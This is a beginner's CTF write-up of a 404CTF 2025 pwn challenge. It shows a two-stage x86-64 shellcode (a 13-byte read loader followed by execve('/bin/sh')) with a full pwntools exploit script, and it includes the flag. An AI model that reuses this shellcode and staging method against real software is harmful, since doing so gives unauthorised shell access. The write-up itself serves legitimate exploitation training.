Spaaaaaaace - 404CTF 2025

TL;DR

RWX memory + 13-byte size limit = staged shellcode time! Upload a tiny loader (13 bytes) that reads a bigger shellcode (24 bytes), then execute it to get shell 🚀

Challenge Files: chall (ELF binary)

Note: This is one of my first CTF writeups! At the time I solved this challenge, I was just starting out with pwn. There are probably cleaner/simpler ways to solve this, but this approach worked for me. If you spot improvements, feel free to share! 🙂

Challenge Overview

We’re given a “Firmware Updater v1.0” for a “space core”.

The program has 3 options:

1. Upload an update      <- Our entry point
2. Run the firmware      <- Executes our code
3. Open a bidirectional connection  <- Just exits

Binary Protections

Let’s check what we’re dealing with:

$ checksec chall
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No

What this means:

✅ NX enabled - Stack isn’t executable (doesn’t matter, we have RWX mmap!)
✅ PIE enabled - Addresses are randomized (also doesn’t matter for us)
❌ No canary - Stack overflow protection disabled
⚠️ Partial RELRO - GOT is writable

But here’s the thing: none of this matters because the program literally gives us RWX memory and executes whatever we send! The protections are meaningless when there’s a deliberate code execution feature. 😎

Source Code Analysis

Let’s look at the juicy parts:

long firmware_max_size = 0xd; // Only 13 bytes!
void *firmware;

// Allocate RWX memory - the good stuff
firmware = mmap(NULL, 0x1000, 
                PROT_READ | PROT_WRITE | PROT_EXEC, 
                MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

The program allocates 4KB (0x1000 bytes) with RWX permissions - read, write, AND execute. That’s shellcode heaven! But there’s a catch…

void upload_update(long firmware_max_size, void* firmware) {
   printf("Ready to receive update > ");
   bytes_read = read(0, firmware, firmware_max_size);
}

void apply_update(void* firmware) {
   ((void (*)())firmware)();  // Cast and execute!
}

The problem: We can only upload 13 bytes (0xd), but a full /bin/sh shellcode needs at least 20-30 bytes. Houston, we have a problem! 🚨

The Solution: Staged Shellcode

Since we can’t fit everything in 13 bytes, we’ll use a two-stage approach:

Stage 1 (13 bytes): A tiny loader that reads more data
Stage 2 (24 bytes): The actual execve shellcode

Think of it like a rocket: Stage 1 gets us into orbit, Stage 2 takes us to the moon! 🌙

Stage 1: The Loader (13 bytes)

This shellcode reads additional bytes from stdin and stores them right after itself:

lea rsi, [rdi+0xd]   ; Calculate where to write (firmware + 13)
xor edi, edi         ; fd = 0 (stdin)
xor eax, eax         ; syscall number 0 (read)
push 0x18            ; Length to read (24 bytes)
pop rdx              ; rdx = 24 (size)
syscall              ; Call read(0, firmware+13, 24)

Machine code: \x48\x8d\x77\x0d\x31\xff\x31\xc0\x6a\x18\x5a\x0f\x05

How it works:

When apply_update() is called, rdi contains the firmware address (function argument)
lea rsi, [rdi+0xd] calculates the address right after our 13-byte shellcode
We set up registers for read(0, firmware+13, 24) syscall
After the syscall, execution continues right into Stage 2!

Stage 2: The Shell (24 bytes)

This is a classic execve("/bin/sh") shellcode:

xor rsi, rsi                      ; rsi = NULL (argv)
push rsi                          ; Push NULL (string terminator)
mov rdi, 0x68732f6e69622f2f       ; Load "//bin/sh" (little-endian)
push rdi                          ; Push "//bin/sh" onto stack
push rsp                          ; Push address of string
pop rdi                           ; rdi = address of "/bin/sh"
xor rdx, rdx                      ; rdx = NULL (envp)
mov al, 0x3b                      ; syscall 59 (execve)
syscall                           ; Call execve("/bin/sh", NULL, NULL)

Machine code: \x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\xb0\x3b\x0f\x05

Exploitation Flow

Here’s how the magic happens:

┌──────────────┐
│ 1. Upload    │  Send Stage 1 (13 bytes)
│    Update    │  
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ 2. Run       │  Execute Stage 1
│    Firmware  │  
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ Stage 1      │  Calls read() to get more data
│ executing... │  Reads 24 more bytes
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ Send Stage 2 │  Our execve shellcode
│ (24 bytes)   │  
└──────┬───────┘
       │
       ▼
┌──────────────┐
│ Stage 2      │  Spawns /bin/sh
│ executing... │  
└──────┬───────┘
       │
       ▼
    🐚 SHELL!

Memory Layout

Before exploitation:

┌─────────────────────────────────────┐
│ firmware address (0x1000 bytes)      │
│ Permissions: RWX                     │
│ Empty...                             │
└─────────────────────────────────────┘

After uploading Stage 1:

┌─────────────────────────────────────┐
│ Stage 1 (13 bytes)                   │
├─────────────────────────────────────┤
│ Empty...                             │
└─────────────────────────────────────┘

After Stage 1 executes:

┌─────────────────────────────────────┐
│ Stage 1 (13 bytes)                   │
├─────────────────────────────────────┤
│ Stage 2 (24 bytes) ← Just loaded!    │
├─────────────────────────────────────┤
│ Empty...                             │
└─────────────────────────────────────┘

Exploit Script

from pwn import *

# Connect to target
io = remote('challenges.404ctf.fr', PORT)
# or for local: io = process('./chall')

# Stage 1: Tiny loader (13 bytes)
stage1 = b"\x48\x8d\x77\x0d"  # lea rsi, [rdi+0xd]
stage1 += b"\x31\xff"          # xor edi, edi
stage1 += b"\x31\xc0"          # xor eax, eax
stage1 += b"\x6a\x18"          # push 0x18
stage1 += b"\x5a"              # pop rdx
stage1 += b"\x0f\x05"          # syscall

log.info(f"Stage 1 size: {len(stage1)} bytes")

# Stage 2: execve("/bin/sh") (24 bytes)
stage2 = b"\x48\x31\xf6"                          # xor rsi, rsi
stage2 += b"\x56"                                  # push rsi
stage2 += b"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68"  # mov rdi, "//bin/sh"
stage2 += b"\x57"                                  # push rdi
stage2 += b"\x54"                                  # push rsp
stage2 += b"\x5f"                                  # pop rdi
stage2 += b"\x48\x31\xd2"                          # xor rdx, rdx
stage2 += b"\xb0\x3b"                              # mov al, 0x3b
stage2 += b"\x0f\x05"                              # syscall

log.info(f"Stage 2 size: {len(stage2)} bytes")

# Step 1: Upload Stage 1
io.sendlineafter(b'> ', b'1')
io.sendafter(b'> ', stage1)

# Step 2: Execute firmware (Stage 1 runs and waits for input)
io.sendlineafter(b'> ', b'2')

# Step 3: Stage 1 is now waiting on read() - send Stage 2!
io.send(stage2)

# Get shell!
io.interactive()

Key Technical Points

1. The ModR/M Byte Matters!

A common mistake: using lea rsp, [rdi+0xd] instead of lea rsi, [rdi+0xd]. This would corrupt the stack pointer instead of setting up our destination address. Always double-check your assembly! 🔍

2. Why Staged Shellcode?

This technique is super common in real exploits:

Limited initial space (buffer size restrictions)
Used in tools like Metasploit
Allows complex payloads despite space constraints

3. Direct Syscalls

We use raw syscalls instead of libc functions for:

Smaller code size
Maximum compatibility
No dependency on libc addresses

4. The “/bin/sh” String

We use //bin/sh (8 bytes) instead of /bin/sh (7 bytes) because it fits perfectly in a 64-bit register. The extra / doesn’t hurt - Linux treats // like /.

Lessons Learned

Exploitation techniques:

Staged payloads - When space is limited, load a small loader first
RWX memory abuse - If you can write and execute, game over
Register conventions - Understanding calling conventions (rdi = first arg)
Shellcode optimization - Every byte counts when space is tight
Stack manipulation - Building strings on the stack for execve

Flag

404CTF{wh3n_l1fe_91ve5_you_LeMOn...}

Lemon

TL;DR#

Challenge Overview#

Binary Protections#

Source Code Analysis#

The Solution: Staged Shellcode#

Stage 1: The Loader (13 bytes)#

Stage 2: The Shell (24 bytes)#

Exploitation Flow#

Memory Layout#

Exploit Script#

Key Technical Points#

1. The ModR/M Byte Matters!#

2. Why Staged Shellcode?#

3. Direct Syscalls#

4. The “/bin/sh” String#

Lessons Learned#

Flag#